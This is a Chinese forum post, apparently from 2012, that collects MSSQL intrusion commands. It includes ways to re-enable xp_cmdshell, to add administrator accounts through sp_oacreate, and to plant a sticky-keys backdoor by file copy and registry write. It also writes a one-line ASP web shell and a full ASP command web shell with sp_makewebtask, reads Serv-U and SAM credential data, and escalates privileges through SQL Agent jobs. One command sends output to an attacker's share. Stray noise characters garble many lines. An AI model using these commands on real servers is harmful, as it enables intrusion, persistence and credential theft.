1 未能找到存储过程'master..xpcmdshell'. EXEC master.dbo.sp_addextendedproc 后用下面的三种方法,在注入点上执行加个空格和;号6 z6 D) u1 M$ ]7 |' e
恢复方法:查询分离器连接后,; `$ N$ m1 K& ~9 N$ z
第一步执行:EXEC sp_addextendedproc xp_cmdshell,@dllname ='xplog70.dll'declare @o int
* M2 q$ _( y, F- t第二步执行:sp_addextendedproc 'xp_cmdshell', 'xpsql70.dll'
# `6 s; v* ], q然后按F5键命令执行完毕9 D3 m. w2 i2 _: l/ T$ t1 k# `
0 ?' n: ]3 U0 v. x" R
2 无法装载 DLL xpsql70.dll 或该DLL所引用的某一 DLL。原因126(找不到指定模块。)/ e; H" p& J S' O1 b2 f. y
恢复方法:查询分离器连接后,
/ ?' \- h) f( e; X' j第一步执行:EXEC master.dbo.sp_dropextendedproc "xp_cmdshell"* ^$ r4 |1 x* L; f, b# O
第二步执行:EXEC master.dbo.sp_addextendedproc 'xp_cmdshell', 'xpsql70.dll'1 [8 k$ l5 ]2 T+ y
然后按F5键命令执行完毕5 x; t3 B" ?" Y$ J% s- j- p8 j5 @; n
: u: B. m! F# M1 l) M/ o0 s" Z; M. E3 无法在库 xpweb70.dll 中找到函数 xp_cmdshell。原因: 127(找不到指定的程序。)* {$ }" o- M. U: y% U3 ^
恢复方法:查询分离器连接后,% ^- p0 j/ O6 Q- G1 w, z4 w3 S0 q& N5 |
第一步执行:exec sp_dropextendedproc 'xp_cmdshell'9 G. u0 n$ [$ r" J3 Z- S( z
第二步执行:exec sp_addextendedproc 'xp_cmdshell','xpweb70.dll' 4 N! A+ X& k5 v9 \% q
然后按F5键命令执行完毕 u* L1 C+ _5 ~) ]2 A( s
8 W' x! M: s+ H/ p
4 终极方法.
% t# J: S$ O, \3 M- ?* O如果以上方法均不可恢复,请尝试用下面的办法直接添加帐户:5 r$ U- [4 A- ?, ]5 Z7 H v/ d! M
查询分离器连接后,
+ W. m2 ^1 x: U$ E2000servser系统:
- @! ~& I& P: g2 h2 ?* W+ @declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\winnt\system32\cmd.exe /c net user 新用户 密码 /add'
: D# o( q2 N6 p0 L$ L$ J3 m& Y1 \, s# B
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\winnt\system32\cmd.exe /c net localgroup administrators 新用户 /add') P- q* B4 X% U+ d7 c8 U% Y# A
3 T; C- |: w A, {
xp或2003server系统:
7 |' S6 Z8 E: S' K8 x2 t7 [$ o8 I/ x3 h
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net user 新用户 密码 /add'
+ r% ?) }2 ^9 o; b
5 N8 b) E( F( a' f5 ^$ vdeclare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net localgroup administrators 新用户 /add'0 L: F5 s3 f* s6 }- q. o
& W- u# t& E2 b* h" U
) g8 L2 t4 G5 }6 G五个SHIFT
) K9 K5 L+ A. \# o+ V% x% Q+ G8 K edeclare @o int exec sp_oacreate 'scripting.filesystemobject', @o out exec sp_oamethod @o, 'copyfile',null,'c:\windows\explorer.exe' ,'c:\windows\system32\sethc.exe';
7 c7 Q+ a: Z5 C! p/ I) D& `$ j% Y P3 J, ~
declare @oo int exec sp_oacreate 'scripting.filesystemobject', @oo out exec sp_oamethod @oo, 'copyfile',null,'c:\windows\system32\sethc.exe' ,'c:\windows\system32\dllcache\sethc.exe';
- G/ h0 i( j( X- {* r0 ~8 n3 f$ a4 C* K6 z' ]' q* ~
xp_cmdshell执行命令另一种方法7 T' F3 b; x8 Q1 v* X# \! S( v* C
declare @a sysname set @a='xp_'+'cmdshell' exec @a 'net user refdom 123456 /add' + s) |8 A9 H1 L0 i4 z
: l* ?" y$ H2 ^7 x, V
判断存储扩展是否存在2 Z5 Y- M( ~2 m/ j# z9 H9 S
Select count(*) from master.dbo.sysobjects where xtype='X' and name='xp_cmdshell'7 d4 b/ l. e4 E, _) S
返回结果为1就OK4 H6 t3 a& S ]( c$ U0 o
% A3 }5 C; o" \8 w N
. j' S i& c A
上传xplog70.dll恢复xp_cmdshell语句:
6 P1 B( z& o# T8 C1 Q% msp_addextendedproc xp_cmdshell,@dllname='E:\newche2\about\XPLOG70.DLL'# M' E. J* I1 j2 D
+ J: k# \) S! Y% }+ B5 v- ~7 q
否则上传xplog7.0.dll4 ?4 @# P! l; D7 I5 {- o |
Exec master.dbo.addextendedproc 'xp_cmdshell','C:\WinNt\System32\xplog70.dll' a% E- i& G. x. n1 A& ]: S6 m
" b. q) V! @/ d" y
6 I. X& }8 C' e: x) E8 s2 h6 }1 c. S7 C% o( a W
首先开启沙盘模式:
$ d# P2 B$ M% |; @( @+ C$ j6 W wexec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',1! V; s" A$ w$ N; h/ P
6 F9 ?0 B7 O: q7 y然后利用jet.oledb执行系统命令) o$ M. B% P. E9 L! a
select * from openrowset('microsoft.jet.oledb.4.0',';database=c:\winnt\system32\ias\ias.mdb','select shell("cmd.exe /c net user admin admin1234 /add")')* P+ Q+ A% }( e4 |: g) M/ S; C
返回 不能找到c:\windows\system32\ias\ias.mdb错误,用exec master..xp_dirtree 'c:\windows\system32\ias\ias',1,1-- 发现c:\windows\system32\ias\ias.mdb没了,应该是被管理员删掉了,还有另一个mdb也没了
3 O' m4 a% W [/ a5 `, P
5 g, u0 K( v. Q5 M- W9 s+ f( P' Z3 S3 A' B. z# p0 T9 t
, F$ Y5 m0 I2 N& ^! }恢复过程sp_addextendedproc 如下: o4 R% X" ?, q6 J1 _; y
create procedure sp_addextendedproc --- 1996/08/30 20:13 B& D3 I$ @6 v# ^0 O) S6 r$ q8 X
@functname nvarchar(517),/* (owner.)name of function to call */ 1 S! p2 i3 X3 X' @) j w7 j6 m, {, g
@dllname varchar(255)/* name of DLL containing function */
. W) l. x: A, L! ?as 5 t4 t$ ~; ]9 p% u
set implicit_transactions off 3 q0 ], Z( x( B/ A) g- {
if @@trancount > 0 , M) S5 G0 Y! H6 p% b
begin ' F) |9 l9 s' k" x+ }1 W
raiserror(15002,-1,-1,'sp_addextendedproc')
@) W5 y- m. h: S9 F9 T- {return (1)
- q7 f( y' Z+ v2 Z$ Dend
; W1 {+ U5 d% N, \& C4 Adbcc addextendedproc( @functname, @dllname)
3 [. C& Y8 y3 S; g/ S: P( Zreturn (0) -- sp_addextendedproc - C- s* X: E% P: D. S
GO $ Z6 b" e! B; g) F3 T" X# g) t1 }8 y6 n
- v; v+ O( b9 R; y# Z& ~. E9 H
; Y3 z5 F- {# X8 U
- x! V' R3 t0 O9 U& {: t7 x$ ?
导出管理员密码文件
/ J; W7 n$ F7 ssa默认可以读sam键.应该。6 {' V! ^! Z% D4 E. m5 Q
reg export HKLM\SAM\SAM\Domains\Account\Users\000001F4 c:\old.reg
4 m6 K! @- J P1 i$ f' J1 @net user administrator test$ I% ?3 l+ M) O: q6 Z& A
用administrator登陆.
; j n4 S1 p. Z用完机器后
7 J- E. A0 ~ d/ z$ H, ^reg import c:\test.reg; ?! t/ x8 v6 ^% H s% g5 ~
根本不用克隆.
+ z) j# m- i+ c. X4 h4 a ~/ {* ]# @找到对应的sid.
3 a$ _# w8 k; Q, x8 |' n9 x9 c8 f. m9 X, T$ A
/ n2 G: p' e# K0 U0 G
8 A9 G4 y& R3 {, _/ ^恢复所有存储过程
, d. d v$ L0 Q. l, G6 Wuse master
( E0 O6 C6 ] U0 T bexec sp_addextendedproc xp_enumgroups,'xplog70.dll' # z- L( I7 l- ~* T! T# @
exec sp_addextendedproc xp_fixeddrives,'xpstar.dll' % ]8 Q# _7 V5 ?6 W
exec sp_addextendedproc xp_loginconfig,'xplog70.dll'
- _6 H0 Z( z# ]3 N, fexec sp_addextendedproc xp_enumerrorlogs,'xpstar.dll' & X5 O2 O2 {0 d& q+ o
exec sp_addextendedproc xp_getfiledetails,'xpstar.dll'
0 D9 y" S7 h! d# @) Eexec sp_addextendedproc sp_OACreate,'odsole70.dll' : M% V) B8 g* q0 j
exec sp_addextendedproc sp_OADestroy,'odsole70.dll' X1 a2 o& V3 W# ?1 Y; X
exec sp_addextendedproc sp_OAGetErrorInfo,'odsole70.dll' : ]5 D* ]1 ~; F+ L- U/ @
exec sp_addextendedproc sp_OAGetProperty,'odsole70.dll'
1 T5 l1 X" F3 o' |! yexec sp_addextendedproc sp_OAMethod,'odsole70.dll' - t% j, }1 ?% O, Q( a5 |
exec sp_addextendedproc sp_OASetProperty,'odsole70.dll'
8 }" i( i, P2 F; ^ pexec sp_addextendedproc sp_OAStop,'odsole70.dll' + `7 `7 [- ]' E8 G! ]1 b% W5 j
exec sp_addextendedproc xp_regaddmultistring,'xpstar.dll' : \* [# J4 j; D5 Z3 c( P* c
exec sp_addextendedproc xp_regdeletekey,'xpstar.dll' 4 n4 L) h9 o! R/ }/ q+ X+ t
exec sp_addextendedproc xp_regdeletevalue,'xpstar.dll'
# K. c& ~2 {0 Z, f" x& p) t1 z6 gexec sp_addextendedproc xp_regenumvalues,'xpstar.dll' ' N0 f3 u) V( `5 k; U+ J* V
exec sp_addextendedproc xp_regread,'xpstar.dll'
% J8 J! M* I$ a: B7 J" H6 Yexec sp_addextendedproc xp_regremovemultistring,'xpstar.dll' 4 Q' h2 w" ?7 d4 _3 h
exec sp_addextendedproc xp_regwrite,'xpstar.dll'
/ b M' z% W5 z+ M5 A, yexec sp_addextendedproc xp_availablemedia,'xpstar.dll'
+ V |* g: T1 b2 `$ p: v- X: ^
% e2 C5 K, r, d0 c, U7 U8 ^0 B) ?2 C& b! {7 p) N
建立读文件的存储过程: G2 Q! w: M* ~+ E1 i0 K2 n
Create proc sp_readTextFile @filename sysname+ M2 G1 t$ ^, X- i' R$ d
as( w4 a9 M$ u _/ W) H) N0 Y. N; w
$ E! G8 m# h5 }' w* Y
begin
l7 `: b' ~" a set nocount on * \ E' \/ z8 t1 N
Create table #tempfile (line varchar(8000))
5 q% W: z( G2 A+ Q exec ('bulk insert #tempfile from "' + @filename + '"')
2 Z: {' C! _- h select * from #tempfile3 H5 q8 a7 M7 I3 [& O# v1 x
drop table #tempfile
2 n4 G/ { `6 xEnd
8 A4 u: j( | v8 o9 g
: ~0 M, O: v. ]# N2 q* C# }exec sp_readTextFile 'D:\testjun17\Teleweb-Japan\default.asp' 利用建立的存储过程读文件! g0 M) H8 t8 q. ]( w5 N k, U
查看登录用户
/ v7 a. S' d+ z! A! O' |Select * from sysxlogins
# M, F) N) {: i' [0 ^+ I
9 w$ u% E6 [6 t7 d; }4 s0 i把文件内容读取到表中2 J9 ?" p7 j" G' b
BULK INSERT tmp from "c:\test.txt"
& ]) T8 A5 x, j) GdElete from 表名 清理表里的内容, a' \. |+ g! I: D! e% T# A& L( E
create table b_test(fn nvarchar(4000));建一个表,字段为fn H) N9 @6 e$ C, l
4 T3 `8 S9 L3 G. g
: |4 ~2 I4 m* Z0 w6 W @! g8 D; l
加sa用户7 p R! v1 I/ q" R6 {& X% K0 X
exec master.dbo.sp_addlogin user,pass;
/ o! ]' e# p8 A& F7 W* i: ^exec master.dbo.sp_addsrvrolemember user,sysadmin: n M& j N! \0 n
* o- i' m* [2 a' ?7 F; {
3 ^! z/ e0 H5 D8 z; K7 R1 R% O. K2 S* n" k) V' Y% Q. s6 x
读文件代码+ V0 u( U! R; r' Q$ ?
declare @o int, @f int, @t int, @ret int
, l* M4 e) Y5 v( B. d8 i1 I: Kdeclare @line varchar(8000)1 b7 f5 f2 _! W" Z- i! G
exec sp_oacreate 'scripting.filesystemobject', @o out
; W- ?, c! H1 l4 v& I: lexec sp_oamethod @o, 'opentextfile', @f out, '文件名', 1
4 U$ P) H- w4 I% U. z0 `) {8 oexec @ret = sp_oamethod @f, 'readline', @line out5 P% m d7 G5 u. r6 J5 d( Z
while( @ret = 0 )0 o; [4 U, F2 l! g( x0 X5 E \
begin
! Y4 _$ p0 Z: R) p0 Z7 a$ Uprint @line
7 J+ o) N! m# h' Q( r/ `8 v# `, iexec @ret = sp_oamethod @f, 'readline', @line out
( E! R3 ]# X( }% Mend
0 f! z' l" ]3 k5 C' ]1 G6 Q( o# l8 X2 Y9 s( u7 K7 r* C
5 ?' B& a9 s/ G4 b
写文件代码:
1 B, M o( }, h Ideclare @o int, @f int, @t int, @ret int
! Z; I' M: a3 X4 Fexec sp_oacreate 'scripting.filesystemobject', @o out
- a) `, d+ `* s, z) g) W; F- kexec sp_oamethod @o, 'createtextfile', @f out, 'd:\Program Files\RhinoSoft.com\Serv-U\ServUDaemon.ini', 1- C' R+ w+ V+ A
exec @ret = sp_oamethod @f, 'writeline', NULL, 《内容》
; u) Y' s9 c1 L/ {6 P% w
! ]) W9 e1 V3 i) I" P+ H6 M2 @& a# a. w$ F1 [- m7 d, f
添加lake2 shell; n( P5 s- Z- ?+ J0 k" o. F
sp_addextendedproc 'xp_lake2', 'c:\recycler\xplake2.dll'4 Z1 {: t W5 A" ~* e1 V
sp_dropextendedproc xp_lake2% M2 p- X) P+ s: z2 V
EXEC xp_lake2 'net user'
( d: d: ~5 \+ {4 R0 e+ |, r G9 T7 T6 M4 Q
- Y! I+ o+ X' \+ v
得到硬盘文件信息 & D8 N5 a4 H/ F7 ~% s# N
--参数说明:目录名,目录深度,是否显示文件
. u1 n4 h% C& T8 Z0 n; r! A& nexecute master..xp_dirtree 'c:'
$ u7 U3 K- t6 q! ?+ texecute master..xp_dirtree 'c:',1 5 ?) N1 t; D& G8 A2 D( Z1 z9 Q1 P
execute master..xp_dirtree 'c:',1,1 ; A4 ~1 h# E; J/ x+ \
* P& {7 Q8 W7 [8 R' k# W& N1 D6 e& D# T8 r8 }% q
读serv-u配置信息
: [; E4 X* k- }" texec sp_readTextFile 'd:\Program Files\RhinoSoft.com\Serv-U\ReadMe.txt'0 I3 x1 m4 e1 m
exec sp_readTextFile 'd:\Program Files\RhinoSoft.com\Serv-U\ServUDaemon.ini'; ]4 b. X+ Y7 w0 d( `8 N" o# [
, W; b9 r0 N! o5 |6 {. n, v2 ?6 V( y通过xp_regwrite写SHIFT后门
+ r. u' K. _ v1 lexec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe','debugger','REG_sz','c:\windows\system32\cmd.exe on';--6 r X4 X8 z1 l4 I4 ?2 _
8 p. O& N- r$ P8 s1 Y( _1 }: z
& E$ [5 d4 i* A
- X6 {: y8 [/ C* E% e
找到web路径然后用exec master.dbo.xp_subdirs 'd:\web\www.xx.com';
9 G- U$ z) z6 y1 N3 @( bexec sp_makewebtask 'd:\web\www.XXXX.com\XX.asp','select''<%execute(request("SB"))%>'' '备 份一个小马就可以了
1 p+ h2 ~1 ?0 v) Q, x2 L% g7 s. k) W5 m8 b: L
EXECUTE sp_makewebtask @outputfile = ‘WEB绝对路径\导出的文件名.asp',@query = 'SELECT 你的字段 FROM 你建的临时表'
- S0 C) K- I( ?6 g3 G/ t, C0 P& `) k' S% {# u, o
. ?6 G+ g" V6 S$ {2 h5 a2 z
* J2 [; m6 w2 [+ @9 Rsql server 2005下开启xp_cmdshell的办法
8 q+ \5 e" [% j8 F' u$ W8 m
$ _& E7 K+ e2 f, w) ^' WEXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 1;RECONFIGURE;+ x/ \3 \2 Z) H; l. A) T
( }9 J) w# C0 X$ b, ?SQL2005开启'OPENROWSET'支持的方法:
+ Q! c( h4 B. C9 T" M/ e" k1 d4 @9 Y! ?# {( r2 [3 q7 p/ ^
exec sp_configure 'show advanced options', 1;RECONFIGURE;exec sp_configure 'Ad Hoc Distributed Queries',1;RECONFIGURE;
9 q8 T1 i$ X4 B- j4 d
8 `* T9 K9 }- \/ O6 wSQL2005开启'sp_oacreate'支持的方法:* K6 {9 f+ }5 f1 \! n" G, Y* ~
- m: e) ]+ o0 T' k7 a
exec sp_configure 'show advanced options', 1;RECONFIGURE;exec sp_configure 'Ole Automation Procedures',1;RECONFIGURE;
~2 n$ G; K4 Q3 U* r
& b$ T- z0 w# B! ~! K' ]5 o4 t2 }4 y# q2 e/ {! D( Q
4 {; T6 A8 K( S. Q; u# Z& K }
. c2 v& j; Z+ Y: Y3 }# _. I
5 b% G' T# @5 h& j/ v, V
3 D/ N% z, R/ S4 D$ L/ X5 c9 T/ ~- S+ I6 U! J. v
+ B. x4 k; E2 b/ ~; M( q2 \& D2 m2 P9 F4 l6 d
$ K9 ~6 e8 Z- f6 w+ x( m
! F+ X( ]2 k; o0 x; g$ b% k9 U, a- o9 t J: I: d% x: o
' u) K, Y/ \5 a
4 A9 V9 |3 D# d: t8 @2 E% f7 c# @8 E+ {, N: k
# b5 {7 t% A9 a" {
6 q0 D( {+ v" I" A1 Q: x. D8 H9 I+ L) {
/ _! o* s+ e, U0 P, g8 N( Z' `( s2 E4 k# d
; k, u8 ?) T% q& A
# ?' U, E; a; d: _/ H) U
! O( K1 z# m( _* E" [- D3 S+ \2 r6 X; `
5 V' g0 b& v' ^& X: l y! ~6 l8 U: C0 r
以下方面不知道能不能成功暂且留下研究哈:
3 F9 _' n3 G7 m3 A9 l) J4)
- T" m% V( g: k8 ~) R( ouse msdb; --这儿不要是master哟- n/ ^3 L4 |+ m7 @
exec sp_add_job @job_name= czy82 ;
% u; V, S3 \& N( iexec sp_add_jobstep @job_name= czy82 ,@step_name = Exec my sql ,@subsystem= CMDEXEC ,@command= dir c:\>c:\b.txt ;
! X, o( H4 X# E) Z* b% A1 V0 ?# b: Mexec sp_add_jobserver @job_name = czy82 ,@server_name = smscomputer ;
7 v$ o. Z& C0 G5 v0 n6 f' ]exec sp_start_job @job_name= czy82 ;
+ P8 {1 ~0 ?; h: t a9 q
! w% [# N. T! B利用MSSQL的作业处理也是可以执行命令的而且如果上面的subsystem的参数是tsql,后面的我们就可以% |7 }" E* g4 W" p
执行tsql语句了.. x- e9 E: U& Z/ @
对于这几个储存过程的使用第一在@server_name我们要指定你的sql的服务器名$ i+ Q. a- H0 b/ O: q7 A; @
第二系统的sqlserveragent服务必须打开(默认没打开的气人了吧)
( ~- e }% E2 h0 _" b% L( Rnet start SQLSERVERAGENT
* G3 \. @% e6 i$ S. F/ o3 A
( l( B' W& F, D) G- r! ?9 P, a对于这个东东还有一个地方不同就是public也可以执行..同这儿也是有系统洞洞的看下面的% t' H( P- i. N+ _% X! w4 k6 B+ A* F
USE msdb
& V9 b7 d4 N; l* [5 @1 v1 f/ @EXEC sp_add_job @job_name = GetSystemOnSQL ,
- P' r" @+ |2 U$ P@enabled = 1,
* Y* }7 B- i9 T@description = This will give a low privileged user access to
) {! `/ ^# u9 y0 i: g$ ^) Jxp_cmdshell ,
! v# e3 S7 Q/ I* t9 a3 v@delete_level = 1; \# F: @$ n' F
EXEC sp_add_jobstep @job_name = GetSystemOnSQL ,, [& A, S; ^3 y g o: Q8 O8 B' y
@step_name = Exec my sql ,
; r2 Q) G: E% |9 L1 f@subsystem = TSQL ,$ m8 Z) F" V7 A6 n. j) I0 \2 f
@command = exec master..xp_execresultset N select exec
) b: S0 N' e! ]) {( h6 {% nmaster..xp_cmdshell "dir > c:\agent-job-results.txt" ,N Master
8 J* b8 V: G- u$ D% @EXEC sp_add_jobserver @job_name = GetSystemOnSQL ,5 \' P! u6 d, [3 d3 S* K
@server_name = 你的SQL的服务器名 . B" L# e- ~( f, s+ c; @" a# g( }4 S
EXEC sp_start_job @job_name = GetSystemOnSQL 4 @2 J# H5 L, A' m' @, L. O1 N+ }
& I+ _" b' [ ?) n1 j# w5 s不要怀疑上面的代码,我是测试成功了的!这儿我们要注意xp_execresultset就是因为它所以
; Z1 [- D0 J7 n: ~* X* a; z才让我们可以以public执行xp_cmdshell
. |0 Z6 k8 l) F( I& Y3 L8 l+ t4 ?" Y' Y8 G
5)关于Microsoft SQL Agent Jobs任意文件可删除覆盖漏洞(public用户也可以)
Y& S4 Y+ X' t) m, ~8 E在安焦有文章:http://www.xfocus.net/vuln/vul_view.php?vul_id=2968( l2 L2 |9 D( d- E- T5 e
% b+ B9 m+ t! y% k- T4 Z! D: j+ N# e% XUSE msdb5 |, C: v# ~7 E ]6 c" b
EXEC sp_add_job @job_name = ArbitraryFilecreate ,; S/ _: y- u' n7 Q( N* [5 P, G
@enabled = 1,
3 M- b$ b0 k2 p% o5 ]@description = This will create a file called c:\sqlafc123.txt ,, G$ M' Y& d9 m8 P V. D: [
@delete_level = 12 J9 u% I+ i! S [5 }+ @
EXEC sp_add_jobstep @job_name = ArbitraryFilecreate ,$ x) l. q5 V% }* q' [& b
@step_name = SQLAFC ,1 L8 n3 h6 |' y1 H
@subsystem = TSQL ,
0 t' c P0 L5 q, J8 K7 t5 w@command = select hello, this file was created by the SQL Agent. ,
$ u; c9 D3 n* s/ X( U@output_file_name = c:\sqlafc123.txt
3 {: F2 w8 Q! j* c& DEXEC sp_add_jobserver @job_name = ArbitraryFilecreate ,% {# G# Q2 j- m
@server_name = SERVER_NAME 2 D0 l. V9 [( G' k0 m8 Y
EXEC sp_start_job @job_name = ArbitraryFilecreate , Z! _7 W- H& @ s' g
3 D: S( b, P; k% k: |如果subsystem选的是:tsql,在生成的文件的头部有如下内容
! {1 N( o2 U" l6 N( o' w
9 `5 \8 r" x; d( Z??揂rbitraryFilecreate? ? 1 ?,揝QLAFC? ???? 2003-02-07 18:24:199 `/ e- _" ]: W" Y
----------------------------------------------' p9 |4 U0 o2 r, I% w( U" n
hello, this file was created by the SQL Agent.3 v) N$ l, R; Q \) W1 \7 j
: ^& H# p P$ J: b) \) [(1 ?????)' @# T$ o& ~( X; _) p; p! e
# Q. H8 {+ u+ V7 u- _' [& ~2 }所以我建议要生成文件最好subsystem选cmdexec,如果利用得好我们可以写一个有添加管理员
! H* r6 u8 C" k9 b9 w- `3 k7 }: W命令的vbs文件到启动目录!. K7 V4 B1 W& X1 b
+ g& A; z! k' D7 N6 h/ X6 }+ f4 a# `
6)关于sp_makewebtask(可以写任意内容任意文件名的文件)
6 @/ q& ]- K* G: w' K, T2 y关于sp_MScopyscriptfile 看下面的例子3 k, C, _; D# N$ u9 p
declare @command varchar(100) : ~3 E* {9 {. K
declare @scripfile varchar(200)
. `# \: n' U$ V5 }: i* bset concat_null_yields_null off
: H" Y* [' J1 r+ }# vselect @command= dir c:\ > "\\attackerip\share\dir.txt"
/ d8 o2 Q! F/ Z( q& m* ^/ [select @scripfile= c:\autoexec.bat > nul" | @command | rd " ) G4 a" b: c) K5 S ^. a
exec sp_MScopyscriptfile @scripfile , # Z0 V4 M/ o" s, ?* l) [
$ t2 ?9 e* y6 |$ W8 u, y1 I, L这两个东东都还在测试试哟
/ ^4 I+ V- {2 R( |让MSSQL的public用户得到一个本机的web shell 7 T, [$ y. O! ~
# ]# D5 j0 a, C7 Q3 y+ W
sp_makewebtask @outputfile= d:\sms\a.asp ,@charset=gb2312,& A; s" N' @& }1 \- w! ]! S
--@query= select <img src=vbscript:msgbox(now())> " I# V# c# ~, T$ c4 B k3 }
--@query= select <%response.write request.servervariables("APPL_PHYSICAL_PATH")%> 2 {. |$ Q- L) Z" F9 W# K
@query= select
1 l1 K. K: H7 X<%On Error Resume Next ( | S, U5 G% p% ~1 _- S
Set oscript = Server.createObject("wscript.SHELL")
: H% \, `. l0 C' a/ W& oSet oscriptNet = Server.createObject("wscript.NETWORK") 6 o4 }$ Y3 ]: V. H, M
Set oFileSys = Server.createObject("scripting.FileSystemObject") * x, }! R" W0 c" J( B, K+ J+ a
szCMD = Request.Form(".CMD") ; o$ F. M- E, Z# N1 l# o
If (szCMD <>"")Then
1 u1 a, x; Y* m- V& T5 S! J7 w+ sszTempFile = "C:\" & oFileSys.GetTempName()
z( m; t- O3 l: J/ sCall oscript.Run ("cmd.exe /c " & szCMD & " > " & szTempFile, 0, True) + J# Z) M3 [; l/ K) q) V" ^
Set oFile = oFilesys.OpenTextFile (szTempFile, 1, False, 0) 3 T: O7 r/ L8 K8 i' L0 j
End If %> . a2 _, w0 [1 E' v' F
<HTML><BODY><FORM action="<%= Request.ServerVariables("URL")%>" method=" OST">
" D; I8 \5 E5 g9 g$ u<input type=text name=".CMD" size=45 value="<%= szCMD %>"><input type=submit value="Run">
% \$ O0 _8 [# s</FORM><RE> ! c5 p" i" F, d( [6 {1 D) _2 v
<% If (IsObject(oFile))Then 5 F: T! N+ N5 `7 x
On Error Resume Next 6 A! L6 S9 \2 Z/ R. D5 ~9 ?
Response.Write Server.HTMLEncode(oFile.ReadAll) F3 _) i+ b. n" Z
oFile.Close ! ]0 \. R2 h5 m8 `2 V, n, `; @* m
Call oFileSys.deleteFile(szTempFile, True) # {! W/ f( T# r4 C6 o2 d1 q# f
End If%> 9 V, S/ o) r7 }! s7 u7 W3 ]
</BODY></HTML> ; V4 L# N2 ^( E/ h2 z% e
|
发表于 2012-9-15 14:37:30
收藏
支持
反对